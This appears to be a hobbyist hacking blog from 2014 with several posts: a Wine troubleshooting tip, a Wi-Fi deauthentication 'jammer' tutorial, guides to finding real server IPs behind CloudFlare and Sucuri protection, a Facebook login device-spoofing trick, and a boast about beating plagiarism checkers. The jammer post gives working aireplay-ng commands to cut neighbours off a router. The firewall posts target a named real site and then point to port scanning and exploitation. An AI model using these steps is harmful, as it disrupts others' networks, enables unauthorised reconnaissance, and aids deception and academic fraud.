November 22, 2014

How not to Whine over Wine - The Logical Kid

Hello!

Today I am going to talk something less in need, but more in demand. Its all in demand when you accidentally, or experimentally end up with your wine.

For those who know what 'wine' is, that's good.

For those who don't know, Wine is a Windows compatibility Layer for Linux, and has been misunderstood as Windows Emulator.
On contrary, WINE means "Wine Is Not an Emulator"

For more clarity, kindly read Debunking Wine Myths.

What made me write this post is whilst I was experimenting with Wine installed on my Ubuntu, and there was some application to be executed on win98, so I had my winecfg (wine configuration utility) set in compatibility mode for windows 98  then executed my windows executable file. To my horror, not only the application failed to execute, but also my wine stopped functioning.
I tried to run winecfg, but in vain. Even that wasn't working.
I tried uninstalling wine, also tried to do it with purge remove and tried re-installing but even then in vain.
Also tried to check the system.reg,user.reg files in the location /home/user/.wine but in vain. Had tough luck in troubleshooting the error.
On analysis, I could see in the task manager that the process 'wine' and all the other associated processes were running, but were not showing up.

The last resort - - -

After googling, I found out that while wine is started, it looks for configuration from the .wine directory and then presents the output accordingly.
Here is what I could understand then. I just renamed the .wine folder to something else, rather .wine1, or you could even rename it as .wine.backup

That's it!
After renaming the directory, just try running wine again.
It works like a charm!
So, now there is no need to whine over wine. :D :)

Good day!

November 8, 2014

Spoof your device while logging into Facebook - The Logical Kid

This post is all about helping you spoof the device name while you login into facebook. On successful execution of this trick (or whatever) you can achieve the following result:

All set?
Lets go!

To start with this, you need to have a facebook application, and the facebook-javascript-sdk code from the following link:
https://developers.facebook.com/docs/facebook-login/login-flow-for-web/v2.2
Copy the code from the 'Quickstart' section.


Note down the application id (appID) of your application.
Replace the value in the code with your appId.



Save the file in your htdocs or www folder of your server at localhost, or some remote host.
I have saved it as t.html in the /var/www/facebook-sdk-env/ folder of my apache server.
Time to execute.

Next is what?
Just open the the file on your server in the browser.
You will be shown the following output:

You will be asked for your facebook credentials, as follows:

 



Upon logging in, you will be displayed with a statement as follows, just to confirm if you have successfully logged in:

Besides this, the activity will be logged in the Security Settings with the device name shown as your application name.
Bingo! Now create applications with some funky names and confuse the person with your devices, and make them believe that you have accessed your facebook account with an iPhone 6Plus, even if you don't have one. Anyways, there's much to it if you can tweak user-agents of your browser a little bit to spoof the Operating System as identified by facebook. For automation and/or easiness, you can use any user-agent switcher plugins anyhow.


Have fun!




September 25, 2014

Bypassing the Plagiarism checker - The Logical Kid

Hello!

I have been watching people messed up when there is an assignment to be written!
There is no problem in writing them all, as you need to submit a soft-copy which will be carefully analysed by some web-based plagiarism checker.
Well, in this case lets try a popular Plagiarism Checker.

To test a couple of lines for plagiarism, lets use the lyrics of one of my favorite songs by Swingin' Utters!
"Stupid Lullabies"

I provide the lyrics in the box which asks for the input to test for any plagiarism.
The lyrics are as follows:
"Singing you stupid lullabies and handcuffed tight behind my back under your mother's watchful eye"

Lets see what the Plagiarism checker shows!





Omg! We are caught! This tool had caught us copying stuff!


Lets give my trick a shot!
Abracadabra..
                                                           Kaboom! Magic!

I am not going to specify the stuff I did to bypass the content from getting caught as plagiarized content, but it is not any inspect-element(ish) kiddo stuff or web based bypass, et al.
The result is genuine, and is 100% guaranteed to bypass the plagiarism check.
No! This ain't some kind of weakness in the Plagiarism checker I have used. This "magic" of mine works good on all the other tools of the sort!

So, don't you think its high time that you shoot your assignments over my mailbox? ;)


"If you are good at something, never do it for free!"

September 16, 2014

Wireless (Access-points) Jammer for fun and profit! - The Logical Kid

Hello everybody!
Today I am going to show you how to jam a wireless access-point , or say a wi-fi router nearby.

Question: Okay! So now do you want me to buy some device for it?
Answer: Obviously NO. This can be done if your laptop can access Wi-Fi, as simple as that. Well, do you mind using Linux OS btw? :)


Tools of the trade (software):
aircrack-ng suite


For Latest yet beta version of aircrack-ng (with patch for -1 always channel)
Linux users, install it by giving the following commands in terminal:

sudo apt-get install subversion libnl-dev                                 
cd /opt/                                                                                                    
sudo svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
cd aircrack-ng                                                                                      
sudo make                                                                                             

sudo make install                                                                               
Now that you have installed the tool, time for action.


Step 1: Check for the wireless interface in your system.

Open the terminal (ctrl+alt+t) and enter the following command:
iwconfig



Step 2: Get the wireless interface in monitor mode.
sudo airmon-ng start <interface_name>

sudo airmon-ng start wlan0


Now, the tool will create another interface named mon0 on which the monitor mode gets enabled.



Step 3: Now, see for all the access points nearby.

sudo airodump-ng mon0



You will see all the wireless access points nearby.


Note the MAC address or the SSID (name) of the access point which you want to block, and also the MAC address of the client whom you want to prevent from accessing the Access Point or say, the router.

Let us consider two scenarios:
i) Disallow all the clients from accessing the target Wi-Fi router.
ii) Disallow a specific client from accessing the target Wi-Fi router.

Scenario i:

1) Open a new terminal (ctrl+alt+t) and enter the following command:

sudo aireplay-ng --deauth 0 -a <access_point_mac_address> <wireless_interface> 

                                                  (or)


 sudo aireplay-ng --deauth 0 -e <SSID> <wireless_interface> 

  Here, let me try to disallow connections of all clients to an access point named "Connectify-me"

So I give the following command:
sudo aireplay-ng --deauth 0 -e Connectify-me mon0

P.s: In cases where you get "channel -1" error, append --ignore-negative-one to the end of the command.

The command would be as follows:

sudo aireplay-ng --deauth 0 -e Connectify-me mon0 --ignore-negative-one


Give ctrl+c to terminate.

 To give a fixed number of deauth requests, change 0 to any specific value.
sudo aireplay-ng --deauth 10 -e Connectify-me mon0 --ignore-negative-one

In this above command, I have asked aireplay-ng to send 10 deauthentication packets.

Thats it! While our aireplay-ng keeps sending deauthentication packets, no client can connect to this Access Point.
As simple as it seems, right?
Remember, this ain't rocket science after-all. :)

Question: Omg! Thats fantabulous, but I love my neighbor for providing me free Wi-Fi so I don't want him to be blocked from accessing Wi-Fi and others too, but then I don't like Mr. Patel's son to access this router --that kid is a torrent leecher! Eats all the data.
Anything to stop only that kid?

Solution: Yes! You do not need to worry, 'coz you can selectively jam any clients too! ;)


Scenario ii:

1) Okay! Now for this, we specifically need to monitor the clients which are connecting to the target router/access point.
Open a new terminal and enter the following command(s):

sudo airodump-ng --bssid <target_access_point_MAC> <interface>

sudo airodump-ng --bssid 6A:5A:B6:A3:7C:48 mon0


We can see two clients connected to our target Access Point.
Good! Now we will try to jam the connectivity of the client which has the MAC address 40:78:6A:A7:95:E5

2) Enter the following command:
sudo aireplay-ng --deauth 10 -c 40:78:6A:A7:95:E5 -e Connectify-me mon0 --ignore-negative-one

where -c is for the client
10 - number of deauth packets to send (If you give 0, that means infinite)




Happy Diwali! :) :D

August 13, 2014

How to Bypass the Sucuri CloudProxy WebSite Firewall - The Logical Kid

Hello once again!

Today, I am going to show how to bypass the 'Sucuri CloudProxy WebSite Firewall' which is same as the CloudFlare protection.

Here, the concept is same.. but anyways this is gonna help people who are looking out for specifically bypassing the 'Sucuri CloudProxy Website Firewall'.

Anyways, the people who already know the power of dns-based hosts enumeration can deal with any kind of such services when they have a good idea about the concept of DNS and subnets and internal networks.

Uhm, that being said.. lets begin with the process.


The first step is pinging the website to get the IP address from where we get reply.

As we can see the IP address 72.x.x.x, lets see what happens when we directly enter the IP in the browser.



Oh! See what we get, an erro stating Invalid URL.
We need not worry though, as this is just the beginning. *evil grin*

Lets start our work of troubling dns for hosts enumeration.
Here, I am using our favorite and easy to use tool 'fierce'

This comes by default with all the major Pentest distros, viz. BackTrack,Kali,Auditor, et al.

Those who don't have it can anyhow download it from ha.ckers.org/fierce/

After downloading, its much simpler to use too!
You just need to provide one parameter in this case.

Its as simple as below:


Just hit the above syntax and wait for the program to work, probably to work wonders!

After the completion of execution, you can see a report as below!


Our work is now to open the IPs in our browser.
I found the last IP interesting which shows that it maps to www1.bhaskar.com
Lets open the IP in the browser and see what happens!


Bingo! We did bypass the Sucuri or whatever CloudProxy to find the real IP of the host.

What next?
Start up with your port-scanning techniques, and all that stuff!
Yea..fire in the hole! :D

August 10, 2014

What are the languages to be learnt for hacking into a computer system?


   This post is all about answering the question which every wannabe hacker keeps asking!
   Well, here are some of the best answers which I personally feel that fit as an apt answer.



Firstly, It doesn't matter what you learn because you have no control over what you might need in the specific circumstances. If the proof-of-concept is written in python, then you need to be able to read python, if the exploit is written in C, then you need to read C. If you are exploiting java applets then you need to handle java

What you do is learn one language really really REALLY well and then go from that.

A very common misconception is that hackers work with source code. They very rarely do. Instead they work with compiled code running in memory. So you need to be able to handle assembly and when you code it's more often to see the resulting assembly and rarely to achieve functionality.

You will find out that learning a programming language or even learning more than one programming language will not get you anywhere near being able to hack
 

itsmerif@maak:/$ ls -l
-rwxr--r--

 

Secondly, Hacking (or rather CRACK-ing) isn't about programming. So language is irrelevant as an answer to this question. Though you'd be much "better" (or should that be "worse") at it if you know nearly all the languages in general use.

What cracking is mostly about is dissembling programs to find loop-holes in their construction. These loopholes you use to gain access to them other than as designed. So if any language can be stated as a prerequisite, then the "assembly" of the program is probably it - whatever that assembly is (x86 based, ARM, etc.). In stuff like web sites the "assembly" might be JavaScript, but then just as easily on the server side it might be JVM / DotNet bytecode, or Python scripts, or whatever else is used.

Ask yourself: "Why do I want to 'hack'?" To learn programming? Then you're wasting your time. To be able to break into systems? Then programming is not what you want to do.

Source: Quora

August 7, 2014

Finding the real IP address of a CloudFlare protected website

Lately, I have been watching many website administrators opting in for CloudFlare security as this seems to protect their website from many attacks, the Denial of Service to say the least.


So how, as a Penetration tester.. or just out of anxiety, curiosity, whatever are you going to get to the real machine?
You need the IP address right?


 Today, I am going to teach you how to bypass the CloudFlare security to get the real IP address of the target site.

Lets begin with pinging the site so that we get to see what IP address responds back.

Here we go:


 Oh! So the IP seems to be 104.x.x.x
Lets try opening the same in the browser.


Omg! See what we got! CloudFlare has denied Direct IP access.

Next what? Should we lose hope and let CloudFlare decide the end of our penetration testing?
Nah!! We are going to bypass this and identify the real IP address on which this website is hosted.




Uhm, okay! Here we are going to enumerate the hosts via DNS. For this, we are going to use a cool script in perl, called "fierce" which is perfect for the required work.

Download the tool from: http://ha.ckers.org/fierce/

Now get the tool into some action, as follows:

P.s: You do not need to prefix every syntax shown here with 'proxychains'.
That is not really required. Just used it to work out with proxy.


..and wait for the tool to get its work done, while you have your tea! Coffee is not a bad option though, but I prefer tea.. special tea! ;)

After the work is done, you get this sort of output:

Hey! Don't be surprised by this. They do simply show us the targets inside and outside this corporate network in which we are interested.
All is well until now!

Now, we need to find the specific IP of the target, and for this I did see all the retrieved host IPs and then checked out for random IPs from the list, and found this particular host interesting, as it caught my eyes.


Yea! This looks interesting, right?
So, I just did paste-in the IP in the address bar, and Eureka! :) :)


We did it! Yayyy!!! ;) :)
Phew! We finally did get the real IP of the target.

Now, we need to continue with the port scanning, vulnerability identification, and those traditional methods of trade leading to the exploitation and payload generation, et al.


Done! :)
Follow the generic pentesting methods from here! :)
All the best!


Gr33tz t0: F-r0Z,GSM50,Guy244,i-maD,KANK,sajjutxt
~The CliQue~